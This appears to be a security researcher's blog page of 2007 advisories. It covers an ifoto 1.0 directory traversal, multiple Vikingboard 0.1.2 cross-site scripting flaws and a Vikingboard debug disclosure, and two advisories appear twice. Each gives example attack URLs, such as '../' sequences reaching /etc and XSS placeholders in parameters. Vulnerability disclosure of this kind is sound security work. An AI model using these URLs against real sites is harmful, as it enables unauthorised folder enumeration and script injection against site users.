#################################################
ifoto traversal folder enumeration
Vendor url:http://ifoto.ireans.com/
Advisore:http://lostmon.blogspot.com/2007/07/
ifoto-traversal-folder-enumeration.html
vendor notify:no exploit include:yes
Secunia:SA26186
BID:25065
SecWatch: SWID1018593
#################################################
ifoto contains a flaw that allows a remote traversal
arbitrary folder enumeration.This flaw exists because the
application does not validate 'dir' variable upon submission
to 'index.php' scripts.This could allow a remote users to
create a specially crafted URL that would execute '../'
directory traversal characters to view folder
structure on the target system with the privileges
of the target web service.
################
versions
################
ifoto 1.0
################
Solution:
################
No solution was available at this time !!!
################
TimeLine
################
Discovered: 18-07-2007
vendor notify:---
vendor response:---
disclosure:25-07-2007
#####################
Examples
#####################
http://[victims]/ifoto/?dir=..%2F..%2F..%2F..%2F..%2F..%2Fetc
http://[victims]/ifoto/?dir=../../../../../../etc
http://[victims]/ifoto/index.php?dir=../../../../../../
################# €nd ############################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Vikingboard multiple Cross site scripting
#################################################
Vikingboard multiple Cross site scripting
Vendor url: http://vikingboard.com/
advisore:http://lostmon.blogspot.com/2007/07/
vikingboard-multiple-cross-site.html
vendor notify:yes exploit include:yes
Secunia:SA26196
BID:25056
SecWatch:SWID1018567
#################################################
Vikingboard is a PHP-based community board designed by
the principle of “less is more”, and features a powerful
web-based extension-system, a lighting-fast cache system
and dynamic web update. Small, but incredibly fast and powerful.
Vikingboard contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts
.This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.
################
versions
################
Vikingboard 0.1.2
################
Solution:
################
No solution was available at this time !!!
################
TimeLine
################
Discovered: 20-07-2007
vendor notify: 25-07-2007
vendor response:
disclosure:25-07-2007
#####################
Examples
#####################
http://localhost/viking/cp.php?mode=9&id=2[XSS-CODE]
http://localhost/viking/cp.php?mode=7&f=1[XSS-CODE]
http://localhost/viking/cp.php?mode=6"e=1[XSS-CODE]
http://localhost/viking/cp.php?mode=12&act=[XSS-CODE]
http://localhost/viking/user.php?u=2[XSS-CODE]
http://localhost/viking/help.php?act=guidelines[XSS-CODE]
we can call the debug parameter to obtain sensitive information.
http://localhost/viking/post.php?mode=00&f=1[XSS-CODE]&poll=0
wen send a private message the field "Message Title " is affected
http://localhost/viking/cp.php?mode=6
we can send a PM with a malformed XSS title to others users
and it is executed wen the vicims go to Inbox on his control panel
http://localhost/viking/cp.php?mode=7&f=1
http://localhost/viking/report.php?p=2[XSS-CODE]
http://localhost/viking/topic.php?t=2&s=0[XSS-CODE]
http://localhost/viking/post.php?mode=03&t=2"e=2[XSS-CODE]
http://localhost/viking/post.php?mode=03&t=2[XSS-CODE]"e=2
http://localhost/viking/post.php?mode=00&f=1&poll=0[XSS-CODE]
http://localhost/viking/post.php?mode=02&p=2[XSS-CODE]
http://localhost/viking/search.php?search=user:administrator&act=dosearch
if the user has any script code in the first lines of any post
wen try fo find all post by this user , and wen the applications
show the results it is executed
##################### €nd ##############################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
Vikingboard multiple Cross site scripting
Vendor url: http://vikingboard.com/
advisore:http://lostmon.blogspot.com/2007/07/
vikingboard-multiple-cross-site.html
vendor notify:yes exploit include:yes
Secunia:SA26196
BID:25056
SecWatch:SWID1018567
#################################################
Vikingboard is a PHP-based community board designed by
the principle of “less is more”, and features a powerful
web-based extension-system, a lighting-fast cache system
and dynamic web update. Small, but incredibly fast and powerful.
Vikingboard contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts
.This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.
################
versions
################
Vikingboard 0.1.2
################
Solution:
################
No solution was available at this time !!!
################
TimeLine
################
Discovered: 20-07-2007
vendor notify: 25-07-2007
vendor response:
disclosure:25-07-2007
#####################
Examples
#####################
http://localhost/viking/cp.php?mode=9&id=2[XSS-CODE]
http://localhost/viking/cp.php?mode=7&f=1[XSS-CODE]
http://localhost/viking/cp.php?mode=6"e=1[XSS-CODE]
http://localhost/viking/cp.php?mode=12&act=[XSS-CODE]
http://localhost/viking/user.php?u=2[XSS-CODE]
http://localhost/viking/help.php?act=guidelines[XSS-CODE]
we can call the debug parameter to obtain sensitive information.
http://localhost/viking/post.php?mode=00&f=1[XSS-CODE]&poll=0
wen send a private message the field "Message Title " is affected
http://localhost/viking/cp.php?mode=6
we can send a PM with a malformed XSS title to others users
and it is executed wen the vicims go to Inbox on his control panel
http://localhost/viking/cp.php?mode=7&f=1
http://localhost/viking/report.php?p=2[XSS-CODE]
http://localhost/viking/topic.php?t=2&s=0[XSS-CODE]
http://localhost/viking/post.php?mode=03&t=2"e=2[XSS-CODE]
http://localhost/viking/post.php?mode=03&t=2[XSS-CODE]"e=2
http://localhost/viking/post.php?mode=00&f=1&poll=0[XSS-CODE]
http://localhost/viking/post.php?mode=02&p=2[XSS-CODE]
http://localhost/viking/search.php?search=user:administrator&act=dosearch
if the user has any script code in the first lines of any post
wen try fo find all post by this user , and wen the applications
show the results it is executed
##################### €nd ##############################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
Vikingboard debug information disclosure
#################################################
Vikingboard debug information disclosure
Vendor url:http://vikingboard.com/
Advisore:http://lostmon.blogspot.com/2007/07/
vikingboard-debug-information.html
vendor notify:yes exploit include:yes
#################################################
Vikingboard is a PHP-based community board designed by
the principle of “less is more”, and features a powerful
web-based extension-system, a lighting-fast cache system
and dynamic web update. Small, but incredibly fast and powerful.
Vikingboard has a weakness, which can be exploited by malicious
people to disclose some system information.
The weakness is caused due to a design error where debug
information can be disclosed by specifying the "debug" parameter.
################
versions
################
Vikingboard 0.1.2
################
Solution:
################
No solution was available at this time !!!
################
TimeLine
################
Discovered: 20-07-2007
vendor notify: 25-07-2007
vendor response:
disclosure: 25-07-2007
#####################
Examples
#####################
http://localhost/viking/forum.php?f=1&debug=1
http://localhost/viking/cp.php?mode=10&debug=1
http://localhost/viking/cp.php?&debug=1
################# €nd ############################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Vikingboard debug information disclosure
Vendor url:http://vikingboard.com/
Advisore:http://lostmon.blogspot.com/2007/07/
vikingboard-debug-information.html
vendor notify:yes exploit include:yes
#################################################
Vikingboard is a PHP-based community board designed by
the principle of “less is more”, and features a powerful
web-based extension-system, a lighting-fast cache system
and dynamic web update. Small, but incredibly fast and powerful.
Vikingboard has a weakness, which can be exploited by malicious
people to disclose some system information.
The weakness is caused due to a design error where debug
information can be disclosed by specifying the "debug" parameter.
################
versions
################
Vikingboard 0.1.2
################
Solution:
################
No solution was available at this time !!!
################
TimeLine
################
Discovered: 20-07-2007
vendor notify: 25-07-2007
vendor response:
disclosure: 25-07-2007
#####################
Examples
#####################
http://localhost/viking/forum.php?f=1&debug=1
http://localhost/viking/cp.php?mode=10&debug=1
http://localhost/viking/cp.php?&debug=1
################# €nd ############################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)